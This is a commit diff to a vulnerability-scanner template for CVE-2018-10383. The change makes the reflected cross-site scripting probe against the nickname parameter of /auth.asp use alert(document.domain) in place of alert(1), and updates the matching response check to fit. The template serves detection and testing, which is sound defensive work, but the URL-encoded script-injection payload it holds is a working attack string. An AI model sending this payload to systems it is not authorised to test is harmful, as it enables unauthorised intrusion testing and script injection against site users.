Update CVE-2018-10383.yaml
parent
1087fac1b2
commit
0ae9113f16
|
@ -40,12 +40,12 @@ http:
|
||||||
|
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /auth.asp?nickname=%22%3E%3Cstyle%20onload%3D%22alert(1)%22%3E HTTP/1.1
|
GET /auth.asp?nickname=%22%3E%3Cstyle%20onload%3D%22alert(document.domain)%22%3E HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- 'contains(body, "><style onload=\"alert(1)\">")'
|
- 'contains(body, "><style onload=\"alert(document.domain)\">")'
|
||||||
- 'status_code == 200'
|
- 'status_code == 200'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
Loading…
Reference in New Issue